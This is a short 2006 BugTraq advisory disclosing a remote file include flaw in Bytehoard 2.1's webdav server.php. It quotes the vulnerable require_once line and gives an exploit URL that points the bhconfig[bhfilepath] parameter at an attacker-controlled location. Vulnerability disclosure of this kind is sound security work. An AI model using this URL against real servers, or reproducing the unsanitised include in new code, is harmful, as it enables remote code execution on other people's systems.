BugTraq
Bytehoard 2.1 Remote File Include Jun 02 2006 03:36AM
beford (xbefordx gmail com)
Script: Bytehoard 2.1 Epsilon/Delta www.bytehoard.org
Discovered: beford <xbefordx gmail com>
File: ./bytehoard/includes/webdav/server.php
Vuln: Remote File Include

[code]
require_once $bhconfig['bhfilepath']."/includes/webdav/_parse_propfind.php";
[/code]

http://url.com/bytehoard/includes/webdav/server.php?bhconfig[bhfilepath]
=attacker

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus